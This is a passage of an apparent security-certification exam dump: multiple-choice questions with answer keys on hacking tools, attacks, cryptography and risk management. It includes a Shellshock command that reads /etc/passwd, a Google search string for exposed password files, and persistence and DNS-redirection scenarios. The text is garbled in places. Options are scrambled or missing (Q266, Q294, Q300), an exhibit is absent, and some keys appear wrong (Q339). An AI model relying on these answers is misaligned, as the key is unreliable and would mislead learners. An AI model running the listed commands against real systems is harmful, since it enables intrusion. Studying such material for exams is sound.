What is this type of DNS configuration commonly called?
A. Split DNS
B. DNSSEC
C. DynDNS
D. DNS Scheme
Correct Answer: A
Section: (none)
Explanation
QUESTION 238
This tool is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data
packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK
attacks, as well as the PTW attack, thus making the attack much faster compared to other WEPcracking tools.
Which of the following tools is being described?
A. Aircrack-ng
B. Airguard
C. WLAN-crack
D. wificracker
Correct Answer: A
Section: (none)
Explanation
QUESTION 239
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE's Common Vulnerabilities
and Exposures (CVE) as CVE-2014-0160.
This bugaffects the OpenSSL implementation of the transport layer security (TLS) protocols defined in
RFC6520.
What type of key does this bug leave exposed to the Internet making exploitation of any compromised system
very easy?
A. Private
B. Public
C. Shared
D. Root
Correct Answer: A
Section: (none)
Explanation
QUESTION 240
In 2007, this wireless security algorithm was rendered useless by capturing packets and discovering the
passkey in a matter of seconds. This security flaw led to anetwork invasion of TJ Maxx and data theft through a
technique known as wardriving.
Which Algorithm is this referring to?
A. Wired Equivalent Privacy (WEP)

B. Wi-Fi Protected Access (WPA)
C. Wi-Fi Protected Access 2 (WPA2)
D. Temporal Key Integrity Protocol(TKIP)
Correct Answer: A
Section: (none)
Explanation
QUESTION 241
This international organization regulates billions of transactions daily and provides security guidelines to protect
personally identifiable information (PII). These security controls provide a baseline and prevent low-level
hackers sometimes known as script kiddies from causing a data breach.
Which of the following organizations is being described?
A. Payment Card Industry(PCI)

B. Center for Disease Control (CDC)
C. Institute of Electrical and Electronics Engineers (IEEE)
D. International Security Industry Organization (ISIO)
Correct Answer: A
Section: (none)
Explanation
QUESTION 242
Your company performs penetration tests and security assessments for small and medium-sized business in
the local area. During a routine security assessment,you discover information that suggests your client is
involved with human trafficking.
What should you do?

A. Immediately stop work and contact the proper legal authorities.
B. Copy the data to removable media and keep it in case you need it.
C. Confront the client in a respectful manner and ask her about the data.
D. Ignore the data and continue the assessment until completed as agreed.
Correct Answer: A
Section: (none)
Explanation
QUESTION 243
Jesse receives an email with an attachment labeled "Court_Notice_21206.zip". Inside the zip file is a file named
"Court_Notice_21206.docx.exe" disguised word document. Upon execution, a window appears stating, "This
word document is corrupt." In the background, the file copies itself to Jesse as a
APPDATA\local directory and begins to beacon to a C2 server to download additional malicious binaries.
What type of malware has Jesse encountered?
A. Trojan
B. Worm
C. Macro Virus
D. Key-Logger
Correct Answer: A
Section: (none)
Explanation
QUESTION 244
Which tool allows analysts and pen testers to examine links between data using graphs and link analysis?
A. Maltego
B. Cain & Abel
C. Metasploit
D. Wireshark
Correct Answer: A
Section: (none)
Explanation
QUESTION 245
While using your bank's online servicing you notice the following string in the URL bar: "http://
www.MyPersonalBank.com/account? id=368940911028389&Damount=10980&Camount=21"
You observe that if you modify the Damount & Camount values and submit the request, that data on the web
page reflect thechanges. Which type of
vulnerability is present on this site?

A. Web Parameter Tampering
B. Cookie Tampering
C. XSS Reflection
D. SQL injection
Correct Answer: A
Section: (none)
Explanation
QUESTION 246
Perspective clients want to see sample reports from previous penetration tests.What should you do next?
A. Decline but, providereferences.

B. Share full reports, not redacted.
C. Share full reports withredactions.
D. Share reports, after NDA issigned.
Correct Answer: A
Section: (none)
Explanation
QUESTION 247
During a blackbox pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled
host. The traffic gets blocked; however, outboundHTTP traffic is unimpeded.
What type of firewall is inspecting outbound traffic?
A. Application
B. Circuit
C. Stateful
D. Packet Filtering
Correct Answer: A
Section: (none)
Explanation
QUESTION 248
Jimmy is standing outside a secure entrance to a facility. He is pretending to have a tense conversation on his
cell phone as an authorized employee badges in.
Jimmy, while still on the phone, grabs the door as it begins to close.What just happened?
A. Piggybacking
B. Masqurading
C. Phishing
D. Whaling
Correct Answer: A
Section: (none)
Explanation
QUESTION 249
You've gained physical access to a Windows 2008 R2 server which has an accessible disc drive. When you
attempt to boot the server and log in, you are unable to guess the password. In your tool kit you have an Ubuntu
9.10 Linux LiveCD. Which Linux based tool has the ability to change any user's password orto activate disabled
Windows accounts?
A. CHNTPW
B. Cain & Abel
C. SET
D. John the Ripper
Correct Answer: A
Section: (none)
Explanation
QUESTION 250
An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to
"www.MyPersonalBank.com", that the user is directed to a phishing site.
Which file does the attacker need to modify?
A. Hosts
B. Sudoers
C. Boot.ini
D. Networks
Correct Answer: A
Section: (none)
Explanation
QUESTION 251
After trying multiple exploits, you've gained root access to a Centos 6 server. To ensure you maintain access,
what would you do first?
A. Create User Account

B. Disable Key Services
C. Disable IPTables
D. Download and Install Netcat
Correct Answer: A
Section: (none)
Explanation
QUESTION 252
env x=`(){ :;};echo exploit` bash -c 'cat /etc/passwd'
What is the Shellshock bash vulnerability attempting to do on an vulnerable Linux host?
A. Display passwd content to prompt

B. Removes the passwd file
C. Changes all passwords inpasswd
D. Add new user to the passwdfile
Correct Answer: A
Section: (none)
Explanation
QUESTION 253
Using Windows CMD, how would an attacker list all the shares to which the current user context has access?
A. NET USE
B. NET CONFIG
C. NET FILE
D. NET VIEW
Correct Answer: A
Section: (none)
Explanation
QUESTION 254
A common cryptographical tool is the use of XOR. XOR the following binary values:10110001
00111010
A. 10001011
B. 11011000
C. 10011101
D. 10111100
Correct Answer: A
Section: (none)
Explanation
QUESTION 255
Which of the following is the successor of SSL?
A. TLS
B. RSA
C. GRE
D. IPSec
Correct Answer: A
Section: (none)
Explanation
QUESTION 256
You are attempting to man-in-the-middle a session. Which protocol will allow you to guess a sequence
number?
A. TCP
B. UPD
C. ICMP
D. UPX
Correct Answer: A
Section: (none)
Explanation
QUESTION 257
Your team has won a contract to infiltrate an organization. The company wants to have the attack be as realistic
as possible; therefore, they did not provide anyinformation besides the company name.
What should be the first step in security testing the client?
A. Reconnaissance
B. Enumeration
C. Scanning
D. Escalation
Correct Answer: A
Section: (none)
Explanation
QUESTION 258
Which regulation defines security and privacy controls for Federal information systems and organizations?
A. NIST-800-53
B. PCI-DSS
C. EU Safe Harbor
D. HIPAA
Correct Answer: A
Section: (none)
Explanation
QUESTION 259
How does the Address Resolution Protocol (ARP) work?
A. It sends a request packet to all the network elements, asking for the MAC address from a specific IP.
B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP.
C. It sends a reply packet for a specific IP, asking for the MAC address.
D. It sends a request packet to all the network elements, asking for the domain name from a specific IP.
Correct Answer: A
Section: (none)
Explanation
QUESTION 260
You are performing information gathering for an important penetration test. You have found pdf, doc, and
images in your objective. You decide to extract metadata from these files and analyze it.
What tool will help you with the task?
A. Metagoofil
B. Armitage
C. Dimitry
D. cdpsnarf
Correct Answer: A
Section: (none)
Explanation
QUESTION 261
When you are collecting information to perform a data analysis, Google commands are very useful to find
sensitive information and files. These files may contain information about passwords, system functions, or
documentation.
What command will help you to search files using Google as a search engine?
A. site: target.com filetype:xls username password email

B. inurl: target.com filename:xls username passwordemail
C. domain: target.com archive:xls username passwordemail
D. site: target.com file:xls username password email
Correct Answer: A
Section: (none)
Explanation
QUESTION 262
What is a "Collision attack" in cryptography?
A. Collision attacks try to find two inputs producing the same hash.
B. Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key.
C. Collision attacks try to get the public key.
D. Collision attacks try to break the hash into three parts to get the plaintext value.
Correct Answer: A
Section: (none)
Explanation
QUESTION 263
You are tasked to perform a penetration test. While you are performing information gathering, you find an
employee list in Google. You find the receptionist's email, and you send her an email changing the source email
to her boss's email( boss@company ). In this email, you ask for a pdf with information. She reads your email
and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain
malware) and send back the modified pdf, saying that the links don't work. She reads your email, opens the
links, and her machine gets infected. You now have access to the company network.
What testing method did you use?
A. Social engineering
B. Tailgating
C. Piggybacking
D. Eavesdropping
Correct Answer: A
Section: (none)
Explanation
QUESTION 264
When you are getting information about a web server, it is very important to know the HTTP Methods (GET,
POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and
DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all
these methods (GET, POST, HEAD, PUT, DELETE, TRACE) using NMAP script engine.
What nmap script will help you with this task?
A. http-methods
B. http enum
C. http-headers
D. http-git
Correct Answer: A
Section: (none)
Explanation
QUESTION 265
When you are testing a web application, it is very useful to employ a proxy tool to save every request and
response. You can manually test every request and analyze the response to find vulnerabilities. You can test
parameter and headers manually to get more precise results than if using web vulnerability scanners.
What proxy tool will help you find web vulnerabilities?
A. Burpsuite
B. Maskgen
C. Dimitry
D. Proxychains
Correct Answer: A
Section: (none)
Explanation
QUESTION 266
You are a Network Security Officer. You have two machines. The first machine (192.168.0.99) has snort
installed, and the second machine (192.168.0.150) has kiwi syslog installed. You perform a syn scan in your
network, and you notice that kiwi syslog is not receiving the alert message from snort. You decide to run
wireshark in the snort machine to check if the messages are going to the kiwi syslog machine.
What wireshark filter will show the connections from the snort machine to kiwi syslogmachine? A.
tcp.dstport==514 && ip.dst==192.168.0.150
A. tcp.srcport==514 && ip.src==192.168.0.99

B. tcp.dstport==514 && ip.dst==192.168.0.0/16 D. tcp.srcport==514&& ip.src==192.168.150
Correct Answer: A
Section: (none)
Explanation
QUESTION 267
This asymmetry cipher is based on factoring the product of two large prime numbers.What cipher is described
above?
A. RSA
B. SHA
C. RC5
D. MD5
Correct Answer: A
Section: (none)
Explanation
QUESTION 268
Which of the following parameters describe LM Hash (see exhibit): Exhibit:
A. I, II, and III
B. I
C. II
D. I and II
Correct Answer: A
Section: (none)
Explanation
QUESTION 269
What is the process of logging, recording, and resolving events that take place in an organization?
A. Incident Management Process

B. Security Policy
C. Internal Procedure
D. Metrics
Correct Answer: A
Section: (none)
Explanation
QUESTION 270
The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization
focused on improving the security of software.
What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks?
A. Injection
B. Cross Site Scripting
C. Cross Site Request Forgery
D. Path disclosure
Correct Answer: A
Section: (none)
Explanation
QUESTION 271
You are performing a penetration test. You achieved access via a buffer overflow exploit and you proceed to
find interesting data, such as files with usernamesand passwords. You find a hidden folder that has the
administrator's bank account password and login information for the administrator's bitcoin account.
What should you do?
A. Report immediately to theadministrator

B. Do not report it and continue the penetration test.
C. Transfer moneyfrom the administrator's account to another account.
D. Do not transfer the money but steal the bitcoins.
Correct Answer: A
Section: (none)
Explanation
QUESTION 272
Which of the following describes the characteristics of a Boot Sector Virus?
A. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR
C. Modifies directory table entries so that directory entries point to the virus code instead of the actual program
D. Overwrites the original MBR and only executes the new virus code
Correct Answer: A
Section: (none)
Explanation
QUESTION 273
You have several plain-text firewall logs that you must review to evaluate network traffic. You know that in order
to do fast, efficient searches of the logs you mustuse regular expressions.
Which command-line utility are you most likely to use?
A. Grep
B. Notepad
C. MS Excel
D. Relational Database
Correct Answer: A
Section: (none)
Explanation
QUESTION 274
You've just been hired to perform a pen test on an organization that has been subjected to a large-scale attack.
The CIO is concerned with mitigating threats andvulnerabilities to totally eliminate risk.
What is one of the first things you should do when given the job?
A. Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels.
B. Interview all employees in the company to rule out possible insider threats.
C. Establish attribution to suspectedattackers.
D. Start the wireshark application to start sniffing network traffic.
Correct Answer: A
Section: (none)
Explanation
QUESTION 275
A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that
were confusing in concluding the Operating System(OS) version installed. Considering the NMAP result below,
which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at 2011-03-
15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT
STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open
631/tcp open ipp 9100/tcp open MAC Address:
00:00:48:0D:EE:8
A. The host is likely a printer.

B. The host is likely a Windows machine.
C. The host is likely a Linux machine.
D. The host is likely a router.
Correct Answer: A
Section: (none)
Explanation
QUESTION 276
Which of the following is the least-likely physical characteristic to be used in biometric control that supports a
large company?
A. Height and Weight

B. Voice
C. Fingerprints
D. Iris patterns
Correct Answer: A
Section: (none)
Explanation
QUESTION 277
Which of the following is not a Bluetooth attack?
A. Bluedriving
B. Bluejacking
C. Bluesmacking
D. Bluesnarfing
Correct Answer: A
Section: (none)
Explanation
QUESTION 278
This phase will increase the odds of success in later phases of the penetration test. It is also the very first step
in Information Gathering, and it will tell you what the"landscape" looks like.
What is the most important phase of ethical hacking in which you need to spend a considerable amount of
time?
A. footprinting
B. network mapping
C. gaining access
D. escalating privileges
Correct Answer: A
Section: (none)
Explanation
QUESTION 279
The purpose of a is to deny network access to local area networks and other information assets by
unauthorized wireless devices.
A. Wireless Intrusion Prevention System

B. Wireless Access Point
C. Wireless Access Control List
D. Wireless Analyzer
Correct Answer: A
Section: (none)
Explanation
QUESTION 280
> NMAP -sn 192.168.11.200-215
The NMAP command above performs which of the following?
A. A ping scan
B. A trace sweep
C. An operating system detect
D. A port scan
Correct Answer: A
Section: (none)
Explanation
QUESTION 281
You are using NMAP to resolve domain names into IP addresses for a ping sweep later. Which ofthe following
commands looks for IP addresses?
A. >host -t a hackeddomain.com
B. >host -t soa hackeddomain.com
C. >host -t ns hackeddomain.com
D. >host -t AXFR hackeddomain.com
Correct Answer: A
Section: (none)
Explanation
QUESTION 282
Which of the following is a command line packet analyzer similar to GUI-based Wireshark?
A. tcpdump
B. nessus
C. etherea
D. Jack the ripper
Correct Answer: A
Section: (none)
Explanation
QUESTION 283
The configuration allows a wired or wireless network interface controller to pass all traffic it receives to the
central processing unit (CPU), rather than passing onlythe frames that the controller is intended to receive.
Which of the following is being described?
A. promiscuous mode
B. port forwarding
C. multi-cast mode
D. WEM
Correct Answer: A
Section: (none)
Explanation
QUESTION 284
Which of the following is an extremely common IDS evasion technique in the web world?
A. unicode characters
B. spyware
C. port knocking
D. subnetting
Correct Answer: A
Section: (none)
Explanation
QUESTION 285
Which of the following is the structure designed to verify and authenticate the identity of individuals within the
enterprise taking part in a data exchange?
A. PKI
B. single sign on
C. biometrics
D. SOA
Correct Answer: A
Section: (none)
Explanation
QUESTION 286
Which of the following is a design pattern based on distinct pieces of software providing application functionality
as services to other applications?
A. Service Oriented Architecture

B. Object Oriented Architecture
C. Lean Coding
D. Agile Process
Correct Answer: A
Section: (none)
Explanation
QUESTION 287
Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?
A. ESP transport mode

B. AH permiscuous
C. ESP confidential
D. AH Tunnel mode
Correct Answer: A
Section: (none)
Explanation
QUESTION 288
Which of the following is assured by the use of a hash?
A. Integrity
B. Confidentiality
C. Authentication
D. Availability
Correct Answer: A
Section: (none)
Explanation
QUESTION 289
Which of the following is the greatest threat posed by backups?
A. A backup is the source of Malware or illicit information.

B. A backup is unavailable during disaster recovery.
C. A backup is incomplete because no verification was performed.
D. An un-encrypted backup can be misplaced or stolen.
Correct Answer: D
Section: (none)
Explanation
QUESTION 290
An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion
Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security.
When the investigator attempts to correlate the information in all of the logs, the sequence of manyof the
logged events do not match up.
What is the most likely cause?
A. The network devices are not all synchronized.

B. Proper chain of custody was not observed while collecting the logs.
C. The attacker altered or erased events from thelogs.
D. The security breach was a falsepositive.
Correct Answer: A
Section: (none)
Explanation
QUESTION 291
In Risk Management, how is the term "likelihood" related to the concept of "threat?"
A. Likelihood is the probability that a threat-source will exploit a vulnerability.

B. Likelihood is a possible threat-source that may exploit a vulnerability.
C. Likelihood is the likely source of a threat that could exploit a vulnerability.
D. Likelihood is the probability that a vulnerability is a threat-source.
Correct Answer: A
Section: (none)
Explanation
QUESTION 292
The chance of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will
require 10 hours to restore the OS and software to thenew hard disk. It will require a further 4 hours to restore
the database from the last backup to the new hard disk. The recovery person earns $10/hour.
Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%).
What is the closest approximate cost of this replacement and recovery operation per year?
A. $146
B. $1320
C. $440
D. $100
Correct Answer: A
Section: (none)
Explanation
QUESTION 293
A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of
the files is a tarball, two are shell script files, and the third is a binary file is named "nc." The FTP server's
access logs show that the anonymous user account logged in to the serv er, uploaded the files, and extracted
the contents of the tarball and ran the script using a function provided by the FTP server's software. The ps
command shows that the nc file is running as process,and the netstat command shows the nc process is
listening on a network port.
What kind of vulnerability must be present to make this remote attack possible?
A. File system permissions

B. Privilege escalation
C. Directory traversal
D. Brute force login
Correct Answer: A
Section: (none)
Explanation
QUESTION 294
While performing online banking using a Web browser, a user receives an email that contains a link to an
interesting Web site. When the user clicks on the link, another Web browser session starts and displays a
video of cats playing a piano. The next business day, the user receives what looks like an email from his
bank,indicating that his bank account has been accessed from a foreign country. The email asks the user to
call his bank and verify the authorization of a funds transferthat took place.
What Web browser-based security vulnerability was exploited to compromise the user?

C. Clickjacking
D. Web form input validation
Correct Answer: A
Section: (none)
Explanation
QUESTION 295
A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies
upon terminating. What sort of security breach isthis policy attempting to mitigate?
A. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's
authentication credentials.
B. Attempts by attackers to access the user and password information stored in the company's SQL database.
C. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge.
D. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were
visited and for how long.
Correct Answer: A
Section: (none)
Explanation
QUESTION 296
A company's Web development team has become aware of a certain type of security vulnerability in their Web
software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the software
requirements to disallow users from entering HTML as input into their Web application.
What kind of Web application vulnerability likely exists in their software?
A. Cross-site scriptingvulnerability
B. Cross-site Request Forgeryvulnerability
C. SQL injectionvulnerability
D. Web site defacement vulnerability
Correct Answer: A
Section: (none)
Explanation
QUESTION 297
Which of the following is considered the best way to protect Personally Identifiable Information (PII) from Web
application vulnerabilities?
A. Use cryptographic storage to store allPII

B. Use encrypted communications protocols to transmitPII
C. Use full disk encryption on all hard drives to protect PII
D. Use a security token to log into all Web applications that use PII
Correct Answer: A
Section: (none)
Explanation
QUESTION 298
Which of the following is one of the most effective ways to prevent Cross-site Scripting (XSS) flaws in software
applications?
A. Validate and escape all information sent to a server

B. Use security policies and procedures to define and implement proper security settings
C. Verify access right before allowing access to protected information and UI controls
D. Use digital certificates to authenticate a server prior to sending data
Correct Answer: A
Section: (none)
Explanation
QUESTION 299
An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital
Subscriber Lines (DSL), wireless data services, andVirtual Private Networks (VPN) over a Frame Relay
network.
Which AAA protocol is most likely able to handle this requirement?
A. RADIUS
B. DIAMETER
C. Kerberos
D. TACACS+
Correct Answer: A
Section: (none)
Explanation
QUESTION 300
A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software
as many of the other clients on the network. The client can see the network, but cannot connect. A wireless
packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requestsbeing
sent by the wireless client.
What is a possible source of this problem?
client's MAC address
A. The WAP does not recognize the

B. The client cannot see the SSID of the wireless network
C. Client is configured for the wrongchannel
D. The wireless client is not configured to useDHCP
Correct Answer: A
Section: (none)
Explanation
QUESTION 301
An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of
packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and
saved to a PCAP file.
What type of network tool can be used to determine if these packets are genuinely malicious or simply a false
positive?
A. Protocol analyzer
B. Intrusion Prevention System (IPS)
C. Network sniffer
D. Vulnerability scanner
Correct Answer: A
Section: (none)
Explanation
QUESTION 302
An attacker gains access to a Web server's database and displays the contents of the table that holds all of the
names, passwords, and other user information. The attacker did this by entering information into the Web site's
user login page that the software's designers did not expect to be entered. This is an example ofwhat kind of
software design problem?
A. Insufficient input validation

B. Insufficient exception handling
C. Insufficient database hardening
D. Insufficient security management
Correct Answer: A
Section: (none)
Explanation
QUESTION 303
Which of the following is a protocol specifically designed for transporting event messages?
A. SYSLOG
B. SMS
C. SNMP
D. ICMP
Correct Answer: A
Section: (none)
Explanation
QUESTION 304
Which of the following security operations is used for determining the attack surface of an organization?
A. Running a network scan to detect network services in the corporate DMZ

B. Training employees on the security policy regarding social engineering
C. Reviewing the need for a security clearance for each employee
D. Using configuration management to determine when and where to apply security patches
Correct Answer: A
Section: (none)
Explanation
QUESTION 305
The security concept of "separation of duties" is most similar to the operation of which type of security device?
A. Firewall
B. Bastion host
C. Intrusion Detection System
D. Honeypot
Correct Answer: A
Section: (none)
Explanation
QUESTION 306
The "black box testing" methodology enforces which kind of restriction?
A. Only the external operation of a system is accessible to the tester.

B. Only the internal operation of a system is known to the tester.
C. The internal operation of a system is only partly accessible to the tester.
D. The internal operation of a system is completely known to the tester.
Correct Answer: A
Section: (none)
Explanation
QUESTION 307
The "gray box testing" methodology enforces what kind of restriction?
A. The internal operation of a system is only partly accessible to the tester.

B. The internal operation of a system is completely known to the tester.
C. Only the external operation of a system is accessible to the tester.
D. Only the internal operation of a system is known to the tester.
Correct Answer: A
Section: (none)
Explanation
QUESTION 308
The "white box testing" methodology enforces what kind of restriction?
A. The internal operation of a system is completely known to the tester.

B. Only the external operation of a system is accessible to the tester.
C. Only the internal operation of a system is known to the tester.
D. The internal operation of a system is only partly accessible to the tester.
Correct Answer: A
Section: (none)
Explanation
QUESTION 309
To determine if a software program properly handles a wide range of invalid input, a form of automated testing
can be used to randomly generate invalid input inan attempt to crash the program.
What term is commonly used when referring to this type of testing?
A. Fuzzing
B. Randomizing
C. Mutating
D. Bounding
Correct Answer: A
Section: (none)
Explanation
QUESTION 310
To maintain compliance with regulatory requirements, a security audit of the systems on a network must be
performed to determine their compliance with securitypolicies. Which one of the following tools would most
likely be used in such an audit?
A. Vulnerability scanner
B. Protocol analyzer
C. Port scanner
D. Intrusion Detection System
Correct Answer: A
Section: (none)
Explanation
QUESTION 311
Which of these options is the most secure procedure for storing backup tapes?
A. In a climate controlled facilityoffsite

B. On a different floor in the samebuilding
C. Inside the data center for faster retrieval in a fireproof safe
D. In a cool dry environment
Correct Answer: A
Section: (none)
Explanation
QUESTION 312
What term describes the amount of risk that remains after the vulnerabilities are classified and the
countermeasures have been deployed?
A. Residual risk
B. Inherent risk
C. Deferred risk
D. Impact risk
Correct Answer: A
Section: (none)
Explanation
QUESTION 313
Risks = Threats x Vulnerabilities is referred to as the:
A. Risk equation
B. Threat assessment
C. BIA equation
D. Disaster recovery formula
Correct Answer: A
Section: (none)
Explanation
QUESTION 314
Which of the following is designed to identify malicious attempts to penetrate systems?
A. Intrusion Detection System

B. Firewall
C. Proxy
D. Router
Correct Answer: A
Section: (none)
Explanation
QUESTION 315
Which of the following is a low-tech way of gaining unauthorized access to systems?
A. Social Engineering
B. Sniffing
C. Eavesdropping
D. Scanning
Correct Answer: A
Section: (none)
Explanation
QUESTION 316
PGP, SSL, and IKE are all examples of which type of cryptography?
A. Public Key
B. Secret Key
C. Hash Algorithm
D. Digest
Correct Answer: A
Section: (none)
Explanation
QUESTION 317
Which method of password cracking takes the most time and effort?
A. Brute force
B. Rainbow tables
C. Dictionary attack
D. Shoulder surfing
Correct Answer: A
Section: (none)
Explanation
QUESTION 318
"Bash Bug" or "ShellShock" vulnerability?
What is the most common method to exploit the
A. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable
to a vulnerable Web server
B. Manipulate format strings in textfields
C. SSH
D. SYN Flood
Correct Answer: A
Section: (none)
Explanation
QUESTION 319
Which of the following tools performs comprehensive tests against web servers, including dangerous files and
CGIs?
A. Nikto
B. Snort
C. John the Ripper
D. Dsniff
Correct Answer: A
Section: (none)
Explanation
QUESTION 320
Which of the following tools is used to analyze the files produced by several packet-capture programs such as
tcpdump, WinDump, Wireshark, and EtherPeek?
A. tcptrace
B. tcptraceroute
C. Nessus
D. OpenVAS
Correct Answer: A
Section: (none)
Explanation
QUESTION 321
Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a
linux platform?
A. Kismet
B. Nessus
C. Netstumbler
D. Abel
Correct Answer: A
Section: (none)
Explanation
QUESTION 322
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, smallsized packets
to the target computer, making it very difficult for anIDS to detect the attack signatures.
Which tool can be used to perform session splicing attacks?
A. Whisker
B. tcpsplice
C. Burp
D. Hydra
Correct Answer: A
Section: (none)
Explanation
QUESTION 323
Which of the following tools can be used for passive OS fingerprinting?
A. tcpdump
B. nmap
C. ping
D. tracert
Correct Answer: A
Section: (none)
Explanation
QUESTION 324
You are the Systems Administrator for a large corporate organization. You need to monitor all network traffic on
your local network for suspicious activities and receive notifications when an attack is occurring. Which tool
would allow you to accomplish this goal?
A. Network-based IDS
B. Firewall
C. Proxy
D. Host-based IDS
Correct Answer: A
Section: (none)
Explanation
QUESTION 325
What does a firewall check to prevent particular ports and applications from getting packets into an
organization?
A. Transport layer port numbers and application layerheaders

B. Presentation layer headers and the session layer port numbers
C. Network layer headers and the session layer port numbers
D. Application layer port numbers and the transport layerheaders
Correct Answer: A
Section: (none)
Explanation
QUESTION 326
You work as a Security Analyst for a retail organization. In securing the company's network, you set up a
firewall and an IDS. However, hackers are able to attack the network. After investigating, you discover that your
IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert isthe
IDS giving?
A. False Negative
B. False Positive
C. True Negative
D. True Positive
Correct Answer: A
Section: (none)
Explanation
QUESTION 327
Which of the following types of firewalls ensures that the packets are part of the established session?
A. Stateful inspectionfirewall
B. Circuit-level firewall
C. Application-levelfirewall
D. Switch-level firewall
Correct Answer: A
Section: (none)
Explanation
QUESTION 328
Which of the following incident handling process phases is responsible for defining rules, collaborating human
workforce, creating a back-up plan, and testing theplans for an organization?
A. Preparation phase
B. Containment phase
C. Identification phase
D. Recovery phase
Correct Answer: A
Section: (none)
Explanation
QUESTION 329
Ricardo wants to send secret messages to a competitor company. To secure these messages, he uses a
technique of hiding a secret message within an ordinarymessage. The technique provides 'security through
obscurity'.
What technique is Ricardo using?
A. Steganography
B. Public-key cryptography
C. RSA algorithm
D. Encryption
Correct Answer: A
Section: (none)
Explanation
QUESTION 330
During a security audit of IT processes, an IS auditor found that there were no documented security
procedures. What should the IS auditor do?
A. Identify and evaluate existing practices

B. Create a procedures document
C. Conduct compliance testing
D. Terminate the audit
Correct Answer: A
Section: (none)
Explanation
QUESTION 331
Which of the following statements regarding ethical hacking is incorrect?
A. Ethical hackers should never use tools or methods that have the potential of exploiting vulnerabilities in an
organization's systems.
B. Testing should be remotely performed offsite.
C. An organization should use ethical hackers who do not sell vendor hardware/software or other consulting
services.
D. Ethical hacking should not involve writing to or modifying the target systems.
Correct Answer: A
Section: (none)
Explanation
QUESTION 332
Craig received a report of all the computers on the network that showed all the missing patches and weak
passwords. What type of software generated this report?
A. a port scanner
B. a vulnerabilityscanner
C. a virus scanner
D. a malware scanner
Correct Answer: B
Section: (none)
Explanation
QUESTION 333
What two conditions must a digital signature meet?
A. Has to be unforgeable, and has to be authentic.

B. Has to be legible and neat.
C. Must be unique and have specialcharacters.
D. Has to be the same number of characters as a physical signature and must be unique.
Correct Answer: A
Section: (none)
Explanation
QUESTION 334
An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server
and NTP server because of the importance of theirjob. The attacker gains access to the DNS server and
redirects the direction www.google.com to his own IP address. Now when the employees of the office want togo
to Google they are being redirected to the attacker machine. What is the name of this kind of attack?
A. ARP Poisoning
B. Smurf Attack
C. DNS spoofing
D. MAC Flooding
Correct Answer: C
Section: (none)
Explanation
QUESTION 335
If executives are found liable for not properly protecting their company's assets and information systems, what
type of law would apply in this situation?
A. Civil
B. International
C. Criminal
D. Common
Correct Answer: A
Section: (none)
Explanation
QUESTION 336
Which tier in the N-tier application architecture is responsible for moving and processing data between the
tiers?
A. Application Layer
B. Data tier
C. Presentation tier
D. Logic tier
Correct Answer: D
Section: (none)
Explanation
QUESTION 337
An attacker tries to do banner grabbing on a remote web server and executes the following command.
$ nmap -sV host.domain.com -p 80He gets the following output.

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-08 19:10 EST Nmapscan report for host.domain.com
(108.61.158.211)
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
Service detection performed. Please report any incorrect results at http://nmap.org/submit/. Nmapdone: 1 IP
address (1 host up) scanned in 6.42 seconds
What did the hacker accomplish?
A. nmap can't retrieve the version number of any running remote service.
B. The hacker successfullycompleted the banner grabbing.
C. The hacker should've used nmap -O host.domain.com.
D. The hacker failed to do banner grabbing as he didn't get the version of the Apache web server.
Correct Answer: B
Section: (none)
Explanation
QUESTION 338
is a set of extensions to DNS that provide to DNS clients (resolvers) origin authentication of DNS data to reduce
the threat of DNS poisoning, spoofing,and similar attacks types.
A. DNSSEC
B. Zone transfer
C. Resource transfer
D. Resource records
Correct Answer: A
Section: (none)
Explanation
QUESTION 339
Sid is a judge for a programming contest. Before the code reaches him it goes through a restricted OS and is
tested there. If it passes, then it moves onto Sid. Whatis this middle step called?
A. Fuzzy-testing thecode
B. Third party running the code
C. Sandboxing the code
D. String validating thecode
Correct Answer: A
Section: (none)
Explanation
QUESTION 340
An IT employee got a call from one of our best customers. The caller wanted to know about the company's
network infrastructure, systems, and team. New opportunities of integration are in sight for both company and
customer. What should this employee do?
A. Since the company's policy is all about Customer Service, he/she will provide information.
B. Disregarding the call, the employee should hang up.
C. The employee should not provide any information without previous management authorization.
